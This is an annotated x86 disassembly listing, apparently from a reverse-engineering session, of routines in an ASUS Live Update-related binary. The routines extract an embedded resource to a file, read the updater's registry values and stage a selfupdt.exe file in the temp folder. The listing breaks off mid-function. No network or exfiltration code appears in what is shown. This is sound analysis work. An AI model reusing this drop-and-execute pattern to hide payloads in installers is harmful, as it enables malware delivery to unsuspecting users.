                            ;*                                               FUNCTION                                               *
                            ;DWORD write_something(HMODULE rsrc_module, LPCWSTR filename, uint rsrc_name, LPCWSTR rsrc_type)
          ;rsrc_module   HMODULE              4                      ;XREF[1,0]:   00401875
          ;filename      LPCWSTR              8                      ;XREF[4,0]:   00401823,004018d6,00401916,0040194d
          ;rsrc_name     uint                 c                      ;XREF[3,0]:   00401867,004019a7,004019c3
          ;rsrc_type     LPCWSTR             10                      ;XREF[1,0]:   00401840
          ;local_8       undefined4          -8                      ;XREF[3,0]:   004018a2,00401932,0040195b
          ;local_c       undefined4          -c                      ;XREF[9,0]:   0040182b,004018fe,00401919,00401936,00401943
                                                                     ;             00401968,00401986,0040199a,004019b6
          ;local_10      undefined4         -10                      ;XREF[2,0]:   004018c1,0040190b
                                                          ;XREF[1,0]:   004036ce
.text:00401810  55              PUSH                EBP                                     
.text:00401811  8bec            MOV                 EBP,ESP                                 
.text:00401813  83ec0c          SUB                 ESP,0xc                                 
.text:00401816  53              PUSH                EBX                                     
.text:00401817  56              PUSH                ESI                                     
.text:00401818  57              PUSH                EDI                                     
.text:00401819  6854d15100      PUSH                .rdata:u_ExtractFile_0051d154           ;= u"ExtractFile\n"
.text:0040181e  e85dfeffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00401823  8b7d0c          MOV                 EDI,dword ptr [EBP + filename+0x4]      
.text:00401826  8bc7            MOV                 EAX,EDI                                 
.text:00401828  83c404          ADD                 ESP,0x4                                 
.text:0040182b  c745f8000...    MOV                 dword ptr [EBP + local_c+0x4],0x0       
.text:00401832  8d5002          LEA                 EDX,[EAX + 0x2]                         
                            LAB_00401835:                 ;XREF[1,0]:   0040183e
.text:00401835  668b08          MOV                 CX,word ptr [EAX]                       
.text:00401838  83c002          ADD                 EAX,0x2                                 
.text:0040183b  6685c9          TEST                CX,CX                                   
.text:0040183e  75f5            JNZ                 LAB_00401835                            
.text:00401840  8b7514          MOV                 ESI,dword ptr [EBP + rsrc_type+0x4]     
.text:00401843  2bc2            SUB                 EAX,EDX                                 
.text:00401845  d1f8            SAR                 EAX,1                                   
.text:00401847  0f8476010000    JZ                  LAB_004019c3                            
.text:0040184d  8bc6            MOV                 EAX,ESI                                 
.text:0040184f  8d5002          LEA                 EDX,[EAX + 0x2]                         
                            LAB_00401852:                 ;XREF[1,0]:   0040185b
.text:00401852  668b08          MOV                 CX,word ptr [EAX]                       
.text:00401855  83c002          ADD                 EAX,0x2                                 
.text:00401858  6685c9          TEST                CX,CX                                   
.text:0040185b  75f5            JNZ                 LAB_00401852                            
.text:0040185d  2bc2            SUB                 EAX,EDX                                 
.text:0040185f  d1f8            SAR                 EAX,1                                   
.text:00401861  0f845c010000    JZ                  LAB_004019c3                            
.text:00401867  8b5d10          MOV                 EBX,dword ptr [EBP + rsrc_name+0x4]     
.text:0040186a  85db            TEST                EBX,EBX                                 
.text:0040186c  0f8e54010000    JLE                 LAB_004019c6                            
.text:00401872  0fb7c3          MOVZX               EAX,BX                                  
.text:00401875  8b5d08          MOV                 EBX,dword ptr [EBP + rsrc_module+0x4]   
.text:00401878  56              PUSH                ESI                                     ;LPCWSTR lpType for FindResourceW
.text:00401879  50              PUSH                EAX                                     ;LPCWSTR lpName for FindResourceW
.text:0040187a  53              PUSH                EBX                                     ;HMODULE hModule for FindResourceW
.text:0040187b  ff1568c45100    CALL                dword ptr [->KERNEL32.DLL::FindResour...
.text:00401881  8bf8            MOV                 EDI,EAX                                 
.text:00401883  85ff            TEST                EDI,EDI                                 
.text:00401885  0f841c010000    JZ                  LAB_004019a7                            
.text:0040188b  6834d15100      PUSH                .rdata:u_Found_resource_0051d134        ;= u"Found resource\n"
.text:00401890  e8ebfdffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00401895  83c404          ADD                 ESP,0x4                                 
.text:00401898  57              PUSH                EDI                                     ;HRSRC hResInfo for LoadResource
.text:00401899  53              PUSH                EBX                                     ;HMODULE hModule for LoadResource
.text:0040189a  ff156cc45100    CALL                dword ptr [->KERNEL32.DLL::LoadResource]
.text:004018a0  8bf0            MOV                 ESI,EAX                                 
.text:004018a2  8975fc          MOV                 dword ptr [EBP + local_8+0x4],ESI       
.text:004018a5  85f6            TEST                ESI,ESI                                 
.text:004018a7  0f84e3000000    JZ                  LAB_00401990                            
.text:004018ad  6810d15100      PUSH                .rdata:u_Loaded_resource_0051d110       ;= u"Loaded resource\n"
.text:004018b2  e8c9fdffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:004018b7  83c404          ADD                 ESP,0x4                                 
.text:004018ba  56              PUSH                ESI                                     ;HGLOBAL hResData for LockResource
.text:004018bb  ff1570c45100    CALL                dword ptr [->KERNEL32.DLL::LockResource]
.text:004018c1  8945f4          MOV                 dword ptr [EBP + local_10+0x4],EAX      
.text:004018c4  85c0            TEST                EAX,EAX                                 
.text:004018c6  0f84a6000000    JZ                  LAB_00401972                            
.text:004018cc  68ecd05100      PUSH                .rdata:u_Locked_resource_0051d0ec       ;= u"Locked resource\n"
.text:004018d1  e8aafdffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:004018d6  8b4d0c          MOV                 ECX,dword ptr [EBP + filename+0x4]      
.text:004018d9  83c404          ADD                 ESP,0x4                                 
.text:004018dc  6a00            PUSH                0x0                                     ;HANDLE hTemplateFile for CreateFileW
.text:004018de  6880000000      PUSH                0x80                                    ;DWORD dwFlagsAndAttributes for Creat...
.text:004018e3  6a02            PUSH                0x2                                     ;DWORD dwCreationDisposition for Crea...
.text:004018e5  6a00            PUSH                0x0                                     ;LPSECURITY_ATTRIBUTES lpSecurityAttr...
.text:004018e7  6a00            PUSH                0x0                                     ;DWORD dwShareMode for CreateFileW
.text:004018e9  6800000040      PUSH                0x40000000                              ;DWORD dwDesiredAccess for CreateFileW
.text:004018ee  51              PUSH                ECX                                     ;LPCWSTR lpFileName for CreateFileW
.text:004018ef  ff1550c45100    CALL                dword ptr [->KERNEL32.DLL::CreateFileW] 
.text:004018f5  8bf0            MOV                 ESI,EAX                                 
.text:004018f7  83feff          CMP                 ESI,-0x1                                
.text:004018fa  7451            JZ                  LAB_0040194d                            
.text:004018fc  6a00            PUSH                0x0                                     ;LPOVERLAPPED lpOverlapped for WriteFile
.text:004018fe  8d55f8          LEA                 EDX=>local_c,[EBP + -0x8]               
.text:00401901  52              PUSH                EDX                                     ;LPDWORD lpNumberOfBytesWritten for W...
.text:00401902  57              PUSH                EDI                                     ;HRSRC hResInfo for SizeofResource
.text:00401903  53              PUSH                EBX                                     ;HMODULE hModule for SizeofResource
.text:00401904  ff1574c45100    CALL                dword ptr [->KERNEL32.DLL::SizeofReso...
.text:0040190a  50              PUSH                EAX                                     ;DWORD nNumberOfBytesToWrite for Writ...
.text:0040190b  8b45f4          MOV                 EAX,dword ptr [EBP + local_10+0x4]      
.text:0040190e  50              PUSH                EAX                                     ;LPCVOID lpBuffer for WriteFile
.text:0040190f  56              PUSH                ESI                                     ;HANDLE hFile for WriteFile
.text:00401910  ff1554c45100    CALL                dword ptr [->KERNEL32.DLL::WriteFile]   
.text:00401916  8b4d0c          MOV                 ECX,dword ptr [EBP + filename+0x4]      
.text:00401919  8b55f8          MOV                 EDX=>local_c,dword ptr [EBP + -0x8]     
.text:0040191c  51              PUSH                ECX                                     
.text:0040191d  52              PUSH                EDX                                     
.text:0040191e  68c0d05100      PUSH                .rdata:u_Wrote_%d_data_to_%s_0051d0c0   ;= u"Wrote %d data to %s\n"
.text:00401923  e858fdffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00401928  83c40c          ADD                 ESP,0xc                                 
.text:0040192b  56              PUSH                ESI                                     ;HANDLE hObject for CloseHandle
.text:0040192c  ff1544c25100    CALL                dword ptr [->KERNEL32.DLL::CloseHandle] 
.text:00401932  8b75fc          MOV                 ESI,dword ptr [EBP + local_8+0x4]       
.text:00401935  56              PUSH                ESI                                     ;HGLOBAL hResData for FreeResource
.text:00401936  c745f8010...    MOV                 dword ptr [EBP + local_c+0x4],0x1       
.text:0040193d  ff1558c45100    CALL                dword ptr [->KERNEL32.DLL::FreeResource]
.text:00401943  8b45f8          MOV                 EAX,dword ptr [EBP + local_c+0x4]       
.text:00401946  5f              POP                 EDI                                     
.text:00401947  5e              POP                 ESI                                     
.text:00401948  5b              POP                 EBX                                     
.text:00401949  8be5            MOV                 ESP,EBP                                 
.text:0040194b  5d              POP                 EBP                                     
.text:0040194c  c3              RET                                                          
                            LAB_0040194d:                 ;XREF[1,0]:   004018fa
.text:0040194d  8b450c          MOV                 EAX,dword ptr [EBP + filename+0x4]      
.text:00401950  50              PUSH                EAX                                     
.text:00401951  6870d05100      PUSH                .rdata:u_Failed_to_create_file!_File_...;= u"Failed to create file! File name...
.text:00401956  e825fdffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:0040195b  8b75fc          MOV                 ESI,dword ptr [EBP + local_8+0x4]       
.text:0040195e  83c408          ADD                 ESP,0x8                                 
.text:00401961  56              PUSH                ESI                                     ;HGLOBAL hResData for FreeResource
.text:00401962  ff1558c45100    CALL                dword ptr [->KERNEL32.DLL::FreeResource]
.text:00401968  8b45f8          MOV                 EAX,dword ptr [EBP + local_c+0x4]       
.text:0040196b  5f              POP                 EDI                                     
.text:0040196c  5e              POP                 ESI                                     
.text:0040196d  5b              POP                 EBX                                     
.text:0040196e  8be5            MOV                 ESP,EBP                                 
.text:00401970  5d              POP                 EBP                                     
.text:00401971  c3              RET                                                          
                            LAB_00401972:                 ;XREF[1,0]:   004018c6
.text:00401972  6838d05100      PUSH                .rdata:u_Failed_to_lock_resource!_005...;= u"Failed to lock resource!\n"
.text:00401977  e804fdffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:0040197c  83c404          ADD                 ESP,0x4                                 
.text:0040197f  56              PUSH                ESI                                     ;HGLOBAL hResData for FreeResource
.text:00401980  ff1558c45100    CALL                dword ptr [->KERNEL32.DLL::FreeResource]
.text:00401986  8b45f8          MOV                 EAX,dword ptr [EBP + local_c+0x4]       
.text:00401989  5f              POP                 EDI                                     
.text:0040198a  5e              POP                 ESI                                     
.text:0040198b  5b              POP                 EBX                                     
.text:0040198c  8be5            MOV                 ESP,EBP                                 
.text:0040198e  5d              POP                 EBP                                     
.text:0040198f  c3              RET                                                          
                            LAB_00401990:                 ;XREF[1,0]:   004018a7
.text:00401990  6804d05100      PUSH                .rdata:u_Failed_to_load_resource!_005...;= u"Failed to load resource!\n"
.text:00401995  e8e6fcffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:0040199a  8b45f8          MOV                 EAX,dword ptr [EBP + local_c+0x4]       
.text:0040199d  83c404          ADD                 ESP,0x4                                 
.text:004019a0  5f              POP                 EDI                                     
.text:004019a1  5e              POP                 ESI                                     
.text:004019a2  5b              POP                 EBX                                     
.text:004019a3  8be5            MOV                 ESP,EBP                                 
.text:004019a5  5d              POP                 EBP                                     
.text:004019a6  c3              RET                                                          
                            LAB_004019a7:                 ;XREF[1,0]:   00401885
.text:004019a7  8b4d10          MOV                 ECX,dword ptr [EBP + rsrc_name+0x4]     
.text:004019aa  51              PUSH                ECX                                     
.text:004019ab  56              PUSH                ESI                                     
.text:004019ac  6898cf5100      PUSH                .rdata:u_Failed_to_find_resource!_Nam...;= u"Failed to find resource! Name = ...
.text:004019b1  e8cafcffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:004019b6  8b45f8          MOV                 EAX,dword ptr [EBP + local_c+0x4]       
.text:004019b9  83c40c          ADD                 ESP,0xc                                 
.text:004019bc  5f              POP                 EDI                                     
.text:004019bd  5e              POP                 ESI                                     
.text:004019be  5b              POP                 EBX                                     
.text:004019bf  8be5            MOV                 ESP,EBP                                 
.text:004019c1  5d              POP                 EBP                                     
.text:004019c2  c3              RET                                                          
                            LAB_004019c3:                 ;XREF[2,0]:   00401847,00401861
.text:004019c3  8b5d10          MOV                 EBX,dword ptr [EBP + rsrc_name+0x4]     
                            LAB_004019c6:                 ;XREF[1,0]:   0040186c
.text:004019c6  8bc6            MOV                 EAX,ESI                                 
.text:004019c8  8d5002          LEA                 EDX,[EAX + 0x2]                         
.text:004019cb  eb03            JMP                 LAB_004019d0                            
                            LAB_004019d0:                 ;XREF[2,0]:   004019cb,004019d9
.text:004019d0  668b08          MOV                 CX,word ptr [EAX]                       
.text:004019d3  83c002          ADD                 EAX,0x2                                 
.text:004019d6  6685c9          TEST                CX,CX                                   
.text:004019d9  75f5            JNZ                 LAB_004019d0                            
.text:004019db  2bc2            SUB                 EAX,EDX                                 
.text:004019dd  d1f8            SAR                 EAX,1                                   
.text:004019df  8bd0            MOV                 EDX,EAX                                 
.text:004019e1  8bc7            MOV                 EAX,EDI                                 
.text:004019e3  8d7802          LEA                 EDI,[EAX + 0x2]                         
                            LAB_004019e6:                 ;XREF[1,0]:   004019ef
.text:004019e6  668b08          MOV                 CX,word ptr [EAX]                       
.text:004019e9  83c002          ADD                 EAX,0x2                                 
.text:004019ec  6685c9          TEST                CX,CX                                   
.text:004019ef  75f5            JNZ                 LAB_004019e6                            
.text:004019f1  53              PUSH                EBX                                     
.text:004019f2  2bc7            SUB                 EAX,EDI                                 
.text:004019f4  52              PUSH                EDX                                     
.text:004019f5  d1f8            SAR                 EAX,1                                   
.text:004019f7  50              PUSH                EAX                                     
.text:004019f8  6808cf5100      PUSH                .rdata:u_Invalid_argument!_Length_of_...;= u"Invalid argument! Length of each...
.text:004019fd  e87efcffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00401a02  83c410          ADD                 ESP,0x10                                
.text:00401a05  5f              POP                 EDI                                     
.text:00401a06  5e              POP                 ESI                                     
.text:00401a07  33c0            XOR                 EAX,EAX                                 
.text:00401a09  5b              POP                 EBX                                     
.text:00401a0a  8be5            MOV                 ESP,EBP                                 
.text:00401a0c  5d              POP                 EBP                                     
.text:00401a0d  c3              RET                                                          
                            ;*                                               FUNCTION                                               *
                            ;undefined drop_rsrc_and_execute(void)
          ;local_8       undefined4          -8                      ;XREF[3,0]:   004034fe,00403518,004035ed
          ;local_10      undefined4         -10                      ;XREF[2,0]:   004032c9,00403718
          ;local_14      undefined4         -14                      ;XREF[2,0]:   004032c2,00403726
          ;local_52      undefined1         -52                      ;XREF[1,0]:   00403308
          ;local_54      undefined2         -54                      ;XREF[5,0]:   0040330f,00403345,00403374,00403385,004033c6
          ;local_25a     undefined1        -25a                      ;XREF[2,0]:   00403475,00403669
          ;file_name     wchar_t           -25c                      ;XREF[7,0]:   0040347c,004034a0,004034b9,00403670,00403694
                                                                     ;             004036aa,004036c5
          ;local_462     undefined1        -462                      ;XREF[2,0]:   0040345a,0040364e
          ;local_464     undefined2        -464                      ;XREF[7,0]:   00403461,0040348b,00403499,00403655,0040367f
                                                                     ;             0040368d,004036e9
          ;local_c66     undefined1        -c66                      ;XREF[1,0]:   0040353a
          ;local_c68     undefined2        -c68                      ;XREF[6,0]:   00403546,0040355a,00403569,00403583,00403597
                                                                     ;             004035ad
          ;local_1466    undefined1       -1466                      ;XREF[2,0]:   0040339f,00403422
          ;local_1468    undefined2       -1468                      ;XREF[4,0]:   004033a6,004033ef,0040341c,00403425
          ;local_146c    undefined4       -146c                      ;XREF[6,0]:   004032d2,00403318,0040333f,004033e9,004035a4
                                                                     ;             004035f9
          ;local_1470    undefined4       -1470                      ;XREF[4,0]:   00403349,00403367,004033f6,0040340f
          ;local_1474    undefined4       -1474                      ;XREF[4,0]:   00403322,00403338,004033b7,004033e2
          ;local_1478    undefined4       -1478                      ;XREF[3,0]:   004032e8,004033dc,00403621
          ;local_147c    undefined1       -147c                      ;XREF[3,0]:   004034f8,0040350a,004035dc
          ;local_1480    undefined1       -1480                      ;XREF[3,0]:   004034ed,00403511,004035e7
                                                          ;XREF[1,0]:   00403a43
.text:004032a0  55              PUSH                EBP                                     
.text:004032a1  8bec            MOV                 EBP,ESP                                 
.text:004032a3  6aff            PUSH                -0x1                                    
.text:004032a5  6886ea5000      PUSH                LAB_0050ea86                            
.text:004032aa  64a100000000    MOV                 EAX,FS:[0x0]                            
.text:004032b0  50              PUSH                EAX                                     
.text:004032b1  b870140000      MOV                 EAX,0x1470                              
.text:004032b6  e8d5550f00      CALL                __alloca_probe                          ;undefined __alloca_probe()
.text:004032bb  a170355600      MOV                 EAX,[.data:DAT_00563570]                ;= BB40E64Eh
.text:004032c0  33c5            XOR                 EAX,EBP                                 
.text:004032c2  8945f0          MOV                 dword ptr [EBP + local_14+0x4],EAX      
.text:004032c5  53              PUSH                EBX                                     
.text:004032c6  56              PUSH                ESI                                     
.text:004032c7  57              PUSH                EDI                                     
.text:004032c8  50              PUSH                EAX                                     
.text:004032c9  8d45f4          LEA                 EAX=>local_10,[EBP + -0xc]              
.text:004032cc  64a300000000    MOV                 FS:[0x0],EAX                            
.text:004032d2  8d8598ebffff    LEA                 EAX=>local_146c,[0xffffeb98 + EBP]      
.text:004032d8  50              PUSH                EAX                                     ;PHKEY phkResult for RegOpenKeyExW
.text:004032d9  6a03            PUSH                0x3                                     ;REGSAM samDesired for RegOpenKeyExW
.text:004032db  33db            XOR                 EBX,EBX                                 
.text:004032dd  53              PUSH                EBX                                     ;DWORD ulOptions for RegOpenKeyExW
.text:004032de  68d8d35100      PUSH                .rdata:u_SOFTWARE\ASUS\ASUS_Live_Upda...;LPCWSTR lpSubKey for RegOpenKeyExW
.text:004032e3  6802000080      PUSH                0x80000002                              ;HKEY hKey for RegOpenKeyExW
.text:004032e8  899d8cebffff    MOV                 dword ptr [local_1478+0x4 + EBP],EBX    
.text:004032ee  ff150cc05100    CALL                dword ptr [->ADVAPI32.DLL::RegOpenKey...
.text:004032f4  85c0            TEST                EAX,EAX                                 
.text:004032f6  0f851a040000    JNZ                 LAB_00403716                            
.text:004032fc  6888d35100      PUSH                .rdata:u_opened_SOFTWARE\ASUS\ASUS_Li...;= u"opened SOFTWARE\\ASUS\\ASUS Live...
.text:00403301  e87ae3ffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00403306  6a3e            PUSH                0x3e                                    
.text:00403308  8d55b2          LEA                 EDX=>local_52,[EBP + -0x4e]             
.text:0040330b  33c9            XOR                 ECX,ECX                                 
.text:0040330d  53              PUSH                EBX                                     
.text:0040330e  52              PUSH                EDX                                     
.text:0040330f  66894db0        MOV                 word ptr [EBP + local_54+0x4],CX        
.text:00403313  e8384a0f00      CALL                FUN_004f7d50                            ;int * FUN_004f7d50(int * param_1, by...
.text:00403318  8b8598ebffff    MOV                 EAX,dword ptr [local_146c+0x4 + EBP]    
.text:0040331e  83c410          ADD                 ESP,0x10                                
.text:00403321  50              PUSH                EAX                                     ;HKEY hKey for RegFlushKey
.text:00403322  c78590ebf...    MOV                 dword ptr [local_1474+0x4 + EBP],0x40   
.text:0040332c  ff1508c05100    CALL                dword ptr [->ADVAPI32.DLL::RegFlushKey] 
.text:00403332  8b3504c05100    MOV                 ESI,dword ptr [->ADVAPI32.DLL::RegQue...;= 0015dbea
.text:00403338  8d8d90ebffff    LEA                 ECX=>local_1474,[0xffffeb90 + EBP]      
.text:0040333e  51              PUSH                ECX                                     ;LPDWORD lpcbData for RegQueryValueExW
.text:0040333f  8b8d98ebffff    MOV                 ECX,dword ptr [local_146c+0x4 + EBP]    
.text:00403345  8d55b0          LEA                 EDX=>local_54,[EBP + -0x50]             
.text:00403348  52              PUSH                EDX                                     ;LPBYTE lpData for RegQueryValueExW
.text:00403349  8d8594ebffff    LEA                 EAX=>local_1470,[0xffffeb94 + EBP]      
.text:0040334f  50              PUSH                EAX                                     ;LPDWORD lpType for RegQueryValueExW
.text:00403350  53              PUSH                EBX                                     ;LPDWORD lpReserved for RegQueryValueExW
.text:00403351  68e4d25100      PUSH                .rdata:u_SelfUpdating_0051d2e4          ;LPCWSTR lpValueName for RegQueryValu...
.text:00403356  51              PUSH                ECX                                     ;HKEY hKey for RegQueryValueExW
.text:00403357  ffd6            CALL                ESI=>ADVAPI32.DLL::RegQueryValueExW     
.text:00403359  8b3d20c45100    MOV                 EDI,dword ptr [->KERNEL32.DLL::GetTem...;= 0015bd14
.text:0040335f  85c0            TEST                EAX,EAX                                 
.text:00403361  0f8592020000    JNZ                 LAB_004035f9                            
.text:00403367  83bd94ebf...    CMP                 dword ptr [local_1470+0x4 + EBP],0x1    
.text:0040336e  0f8585020000    JNZ                 LAB_004035f9                            
.text:00403374  8d55b0          LEA                 EDX=>local_54,[EBP + -0x50]             
.text:00403377  52              PUSH                EDX                                     
.text:00403378  6858df5100      PUSH                .rdata:u_Detected_SelfUpdating_regist...;= u"Detected SelfUpdating registry k...
.text:0040337d  e8fee2ffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00403382  83c408          ADD                 ESP,0x8                                 
.text:00403385  8d45b0          LEA                 EAX=>local_54,[EBP + -0x50]             
.text:00403388  50              PUSH                EAX                                     ;LPCWSTR lpString for lstrlenW
.text:00403389  ff154cc45100    CALL                dword ptr [->KERNEL32.DLL::lstrlenW]    
.text:0040338f  85c0            TEST                EAX,EAX                                 
.text:00403391  0f8e62020000    JLE                 LAB_004035f9                            
.text:00403397  33c9            XOR                 ECX,ECX                                 
.text:00403399  68fe070000      PUSH                0x7fe                                   
.text:0040339e  51              PUSH                ECX                                     
.text:0040339f  8d959eebffff    LEA                 EDX=>local_1466,[0xffffeb9e + EBP]      
.text:004033a5  52              PUSH                EDX                                     
.text:004033a6  66898d9ce...    MOV                 word ptr [local_1468+0x4 + EBP],CX      
.text:004033ad  e89e490f00      CALL                FUN_004f7d50                            ;int * FUN_004f7d50(int * param_1, by...
.text:004033b2  681cdf5100      PUSH                .rdata:u_SelfUpdating_key_length_>_0_...;= u"SelfUpdating key length > 0\n"
.text:004033b7  c78590ebf...    MOV                 dword ptr [local_1474+0x4 + EBP],0x800  
.text:004033c1  e8bae2ffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:004033c6  8d45b0          LEA                 EAX=>local_54,[EBP + -0x50]             
.text:004033c9  6810df5100      PUSH                .rdata:u_3.3.4_0051df10                 ;= u"3.3.4"
.text:004033ce  50              PUSH                EAX                                     
.text:004033cf  e82cdcffff      CALL                FUN_00401000                            ;undefined FUN_00401000(wchar_t * par...
.text:004033d4  83c418          ADD                 ESP,0x18                                
.text:004033d7  83f801          CMP                 EAX,0x1                                 
.text:004033da  7506            JNZ                 LAB_004033e2                            
.text:004033dc  89858cebffff    MOV                 dword ptr [local_1478+0x4 + EBP],EAX    
                            LAB_004033e2:                 ;XREF[1,0]:   004033da
.text:004033e2  8d8d90ebffff    LEA                 ECX=>local_1474,[0xffffeb90 + EBP]      
.text:004033e8  51              PUSH                ECX                                     ;LPDWORD lpcbData for RegQueryValueExW
.text:004033e9  8b8d98ebffff    MOV                 ECX,dword ptr [local_146c+0x4 + EBP]    
.text:004033ef  8d959cebffff    LEA                 EDX=>local_1468,[0xffffeb9c + EBP]      
.text:004033f5  52              PUSH                EDX                                     ;LPBYTE lpData for RegQueryValueExW
.text:004033f6  8d8594ebffff    LEA                 EAX=>local_1470,[0xffffeb94 + EBP]      
.text:004033fc  50              PUSH                EAX                                     ;LPDWORD lpType for RegQueryValueExW
.text:004033fd  6a00            PUSH                0x0                                     ;LPDWORD lpReserved for RegQueryValueExW
.text:004033ff  68e4d45100      PUSH                .rdata:u_SelfUpdtPath_0051d4e4          ;LPCWSTR lpValueName for RegQueryValu...
.text:00403404  51              PUSH                ECX                                     ;HKEY hKey for RegQueryValueExW
.text:00403405  ffd6            CALL                ESI=>ADVAPI32.DLL::RegQueryValueExW     
.text:00403407  85c0            TEST                EAX,EAX                                 
.text:00403409  0f85d1000000    JNZ                 LAB_004034e0                            
.text:0040340f  83bd94ebf...    CMP                 dword ptr [local_1470+0x4 + EBP],0x1    
.text:00403416  0f85c4000000    JNZ                 LAB_004034e0                            
.text:0040341c  8d859cebffff    LEA                 EAX=>local_1468,[0xffffeb9c + EBP]      
.text:00403422  8d5002          LEA                 EDX=>local_1466,[EAX + 0x2]             
                            LAB_00403425:                 ;XREF[1,0]:   0040342e
.text:00403425  668b08          MOV                 CX,word ptr [EAX]=>local_1468           
.text:00403428  83c002          ADD                 EAX,0x2                                 
.text:0040342b  6685c9          TEST                CX,CX                                   
.text:0040342e  75f5            JNZ                 LAB_00403425                            
.text:00403430  2bc2            SUB                 EAX,EDX                                 
.text:00403432  d1f8            SAR                 EAX,1                                   
.text:00403434  0f84a6000000    JZ                  LAB_004034e0                            
.text:0040343a  6890de5100      PUSH                .rdata:u_SelfUpdtPath_registry_key_ex...;= u"SelfUpdtPath registry key existe...
.text:0040343f  e83ce2ffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00403444  83c404          ADD                 ESP,0x4                                 
.text:00403447  68b80b0000      PUSH                0xbb8                                   ;DWORD dwMilliseconds for Sleep
.text:0040344c  ff1524c45100    CALL                dword ptr [->KERNEL32.DLL::Sleep]       
.text:00403452  33d2            XOR                 EDX,EDX                                 
.text:00403454  6806020000      PUSH                0x206                                   
.text:00403459  52              PUSH                EDX                                     
.text:0040345a  8d85a2fbffff    LEA                 EAX=>local_462,[0xfffffba2 + EBP]       
.text:00403460  50              PUSH                EAX                                     
.text:00403461  668995a0f...    MOV                 word ptr [local_464+0x4 + EBP],DX       
.text:00403468  e8e3480f00      CALL                FUN_004f7d50                            ;int * FUN_004f7d50(int * param_1, by...
.text:0040346d  33c9            XOR                 ECX,ECX                                 
.text:0040346f  6806020000      PUSH                0x206                                   
.text:00403474  51              PUSH                ECX                                     
.text:00403475  8d95aafdffff    LEA                 EDX=>local_25a,[0xfffffdaa + EBP]       
.text:0040347b  52              PUSH                EDX                                     
.text:0040347c  66898da8f...    MOV                 word ptr [file_name+0x4 + EBP],CX       
.text:00403483  e8c8480f00      CALL                FUN_004f7d50                            ;int * FUN_004f7d50(int * param_1, by...
.text:00403488  83c418          ADD                 ESP,0x18                                
.text:0040348b  8d85a0fbffff    LEA                 EAX=>local_464,[0xfffffba0 + EBP]       
.text:00403491  50              PUSH                EAX                                     ;LPWSTR lpBuffer for GetTempPathW
.text:00403492  6804010000      PUSH                0x104                                   ;DWORD nBufferLength for GetTempPathW
.text:00403497  ffd7            CALL                EDI=>KERNEL32.DLL::GetTempPathW         
.text:00403499  8d8da0fbffff    LEA                 ECX=>local_464,[0xfffffba0 + EBP]       
.text:0040349f  51              PUSH                ECX                                     
.text:004034a0  8d95a8fdffff    LEA                 EDX=>file_name,[0xfffffda8 + EBP]       
.text:004034a6  6870de5100      PUSH                .rdata:u_%sselfupdt.exe_0051de70        ;= u"%sselfupdt.exe"
.text:004034ab  52              PUSH                EDX                                     
.text:004034ac  ba04010000      MOV                 EDX,0x104                               
.text:004034b1  e87addffff      CALL                printf_wrapper                          ;void printf_wrapper(undefined4 param...
.text:004034b6  83c40c          ADD                 ESP,0xc                                 
.text:004034b9  8d85a8fdffff    LEA                 EAX=>file_name,[0xfffffda8 + EBP]       
.text:004034bf  50              PUSH                EAX                                     ;LPCWSTR lpFileName for DeleteFileW
.text:004034c0  ff153cc45100    CALL                dword ptr [->KERNEL32.DLL::DeleteFileW] 
.text:004034c6  68e4d45100      PUSH                .rdata:u_SelfUpdtPath_0051d4e4          ;LPCWSTR pszValue for SHDeleteValueW
.text:004034cb  68d8d35100      PUSH                .rdata:u_SOFTWARE\ASUS\ASUS_Live_Upda...;LPCWSTR pszSubKey for SHDeleteValueW
.text:004034d0  6802000080      PUSH                0x80000002                              ;HKEY hkey for SHDeleteValueW
.text:004034d5  ff1528c55100    CALL                dword ptr [->SHLWAPI.DLL::SHDeleteVal...
.text:004034db  e919010000      JMP                 LAB_004035f9                            
                            LAB_004034e0:                 ;XREF[3,0]:   00403409,00403416,00403434
.text:004034e0  6820de5100      PUSH                .rdata:u_SelfUpdtPath_registry_key_no...;= u"SelfUpdtPath registry key not ex...
.text:004034e5  e896e1ffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:004034ea  83c404          ADD                 ESP,0x4                                 
.text:004034ed  8d8d84ebffff    LEA                 ECX=>local_1480,[0xffffeb84 + EBP]      
.text:004034f3  e8e8f0ffff      CALL                ATL::CStringT.text:004034f8  8d8d88ebffff    LEA                 ECX=>local_147c,[0xffffeb88 + EBP]      
.text:004034fe  c745fc000...    MOV                 dword ptr [EBP + local_8+0x4],0x0       
.text:00403505  e8d6f0ffff      CALL                ATL::CStringT.text:0040350a  8d8d88ebffff    LEA                 ECX=>local_147c,[0xffffeb88 + EBP]      
.text:00403510  51              PUSH                ECX                                     
.text:00403511  8d9584ebffff    LEA                 EDX=>local_1480,[0xffffeb84 + EBP]      
.text:00403517  52              PUSH                EDX                                     
.text:00403518  c645fc01        MOV                 byte ptr [EBP + local_8+0x4],0x1        
.text:0040351c  e8dff9ffff      CALL                FUN_00402f00                            ;undefined FUN_00402f00(CSimpleString...
.text:00403521  83c408          ADD                 ESP,0x8                                 
.text:00403524  85c0            TEST                EAX,EAX                                 
.text:00403526  750a            JNZ                 LAB_00403532                            
.text:00403528  68b8dd5100      PUSH                .rdata:u_Unable_to_find_previous_vers...;= u"Unable to find previous version....
.text:0040352d  e9a2000000      JMP                 LAB_004035d4                            
                            LAB_00403532:                 ;XREF[1,0]:   00403526
.text:00403532  33c0            XOR                 EAX,EAX                                 
.text:00403534  6800080000      PUSH                0x800                                   
.text:00403539  50              PUSH                EAX                                     
